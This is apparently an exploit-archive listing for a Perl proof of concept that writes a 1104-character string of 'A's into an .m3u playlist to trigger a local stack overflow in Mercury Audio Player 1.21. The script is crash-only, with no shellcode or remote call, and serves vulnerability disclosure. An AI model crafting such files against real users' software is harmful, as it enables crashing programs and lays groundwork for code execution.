Mercury Audio Player version 1.21 local stack overflow proof of concept exploit that creates a malicious .m3u file.
5b83e41243e20543ddf2cfff77a94b0d###################################################################################
#### Mercury Audio Player 1.21 (.M3U File) Local Stack Overflow PoC #####
#### Discovered by SirGod - www.mortal-team.net #####
###################################################################################
my $chars= "A" x 1104;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
Comments
No comments yet, be the first!